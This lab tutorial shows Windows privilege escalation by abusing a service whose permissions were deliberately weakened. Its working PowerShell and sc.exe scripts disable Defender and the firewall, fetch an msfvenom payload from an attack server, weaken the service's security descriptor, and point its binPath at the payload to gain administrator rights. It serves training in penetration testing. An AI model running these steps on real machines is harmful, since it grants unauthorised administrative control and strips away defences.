Windows Privilege Escalation
Using WinPEAS
Making use of a service with weak permissions (a "modifiable service" in WinPEAS terms) rather than a true unquoted-service-path bug: the steps below deliberately grant a low-privileged user the right to reconfigure and restart a service, then point its binary path at a payload.
The target Windows machine has a non-privileged user: localuser.
Use MSFVenom to generate an executable (ASCService.exe) that adds localuser to the local Administrators group when it runs.
1. Generate the payload with MSFVenom on the attack machine.
2. Start a web server on the attack machine to host the payload and WinPEAS.
3. Disable Windows Defender and the firewall on the victim machine (lab only, so the payload is not quarantined on download).
Run the following from an elevated (administrator) PowerShell:
4. From the victim, connect back to the attack machine's web server in a browser.
Navigate to and download the payloads.
Move these downloads to the C:\ folder.
Next we need to grant the local users permission to start, stop and reconfigure the service. This is how we simulate excessive permissions on a service. The change is made with sc sdset, which replaces the service's whole security descriptor with the supplied SDDL string, so the existing ACEs must be carried over into it.
You should see a response of [SC] SetServiceObjectSecurity SUCCESS.
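The lab-setup half of the procedure (steps 3, 4 and the permission change) as one script, added here as an example and not code from the original page. It assumes a hypothetical service name VulnSvc (the page does not name the service), a hypothetical attack-machine URL, and that the payload was built with an msfvenom exec payload (for instance `msfvenom -p windows/x64/exec CMD="net localgroup administrators localuser /add" -f exe-service -o ASCService.exe`) and served with something like `python3 -m http.server 8000`. It downloads with Invoke-WebRequest instead of the browser, and builds the weak SDDL from the service's current descriptor rather than typing a fresh one:

```powershell
# Added lab-setup example (not from the original page). Run from an elevated
# PowerShell on the victim. Assumptions: hypothetical service name 'VulnSvc',
# hypothetical attack-machine web server, payload/tool names as on the page.
$ServiceName = 'VulnSvc'                     # hypothetical: substitute the real service
$AttackerUrl = 'http://10.10.10.10:8000'     # hypothetical attack-machine web server

# Step 3 (lab only): stop Defender quarantining the msfvenom payload, open the firewall.
Set-MpPreference -DisableRealtimeMonitoring $true
netsh advfirewall set allprofiles state off

# Step 4: fetch the payload and WinPEAS straight into C:\ (the page uses the browser).
foreach ($f in 'ASCService.exe', 'winPEASx64.exe') {
    Invoke-WebRequest -Uri "$AttackerUrl/$f" -OutFile "C:\$f"
}

# Grant Authenticated Users (AU) the rights a low-privileged user needs to abuse the
# service: CC/LC = query config/status, DC = change config, RP = start, WP = stop.
# sc sdset REPLACES the whole descriptor, so read the current one with sdshow and
# insert the new ACE into the DACL (the part before 'S:') instead of overwriting it.
$weakAce = '(A;;CCDCLCSWRPWPLOCRRC;;;AU)'
$current = (sc.exe sdshow $ServiceName | Where-Object { $_ -match '^D:' }).Trim()
if ($current -match '^(D:.*?)(S:.*)?$') {
    $newSddl = $Matches[1] + $weakAce + $Matches[2]   # $Matches[2] is empty if no SACL
} else {
    throw "Could not parse the security descriptor of $ServiceName"
}
sc.exe sdset $ServiceName $newSddl          # expect: [SC] SetServiceObjectSecurity SUCCESS

# Confirm the ACE landed; WinPEAS should now list the service under Modifiable Services.
sc.exe sdshow $ServiceName
```

Use sc.exe explicitly in PowerShell, because the bare name sc resolves to the Set-Content alias. The DC right is the one that matters for the later binPath change; start/stop alone would only let the user restart the service, not hijack it.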
Run Command Prompt as the low-privileged user (localuser)
Search for cmd > right click > Run as different user, and enter localuser's credentials
Check which accounts are in the local Administrators group (localuser should not be listed yet):
C:\> net localgroup administrators
Run WinPEAS.exe
Run only the services check (the servicesinfo argument) to keep the output focused.
A few sections often used for privilege escalation are
"Interesting Services -non Microsoft-" and
"Modifiable Services". The latter lists services whose configuration the current user is allowed to change, which is exactly the permission granted above.
Now query the service's configuration (binary path, start type, service account) with sc qc:
Next, confirm that we can stop and start the service:
Now modify the service binPath so it points at our new executable. The same change can instead run any command, such as adding a new user:
Now start the service so that it executes our payload:
Since we have permission to modify the service configuration and restart it, the Service Control Manager runs our payload in the service's account (typically LocalSystem), which adds localuser to the local Administrators group. Group membership is applied at logon, so log off and back on (or open a new "run as" session) before the new privileges appear in the token, and put the original binPath back so the service is not left broken.
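The exploitation half (check membership, enumerate, query, start/stop, retarget binPath, trigger, verify, restore) as one script run from the localuser session. This is an added example, not the page's own commands; it assumes the same hypothetical service name VulnSvc and the payload and WinPEAS sitting in C:\ with the names used on the page:

```powershell
# Added exploitation example (not from the original page). Run as localuser.
# Assumptions: hypothetical service name 'VulnSvc'; payload at C:\ASCService.exe;
# WinPEAS at C:\winPEASx64.exe.
$ServiceName = 'VulnSvc'
$Payload     = 'C:\ASCService.exe'

whoami
net localgroup administrators                 # localuser should NOT be listed yet

# Enumerate: WinPEAS services check; read the "Modifiable Services" section.
C:\winPEASx64.exe servicesinfo

# Confirm by hand: configuration, DACL (look for DC+RP+WP granted to AU or to
# localuser), and that we really can stop/start the service.
sc.exe qc $ServiceName
sc.exe sdshow $ServiceName
sc.exe stop  $ServiceName                     # error 1062 here just means it was not running
sc.exe start $ServiceName

# Save the original binary path so the service can be restored afterwards.
$original = (sc.exe qc $ServiceName | Select-String 'BINARY_PATH_NAME').ToString().Split(':', 2)[1].Trim()

# Exploit: point binPath at the payload (the space after 'binPath=' is required by sc)
# and restart the service so the SCM launches the payload in the service's account.
sc.exe config $ServiceName binPath= $Payload
sc.exe stop  $ServiceName
sc.exe start $ServiceName
# If the payload was built as a plain exe (not -f exe-service) the start ends with
# error 1053 because the binary never reports back to the SCM; the command has still run.

net localgroup administrators                 # localuser should now be listed

# Clean up: restore the original binPath. The new group membership only shows up in
# a fresh logon token, so open a new session before testing the elevated access.
sc.exe config $ServiceName binPath= $original
```

If sc config fails with access denied, the DACL does not carry the DC right for your account; check the sdshow output again rather than assuming start/stop rights are enough.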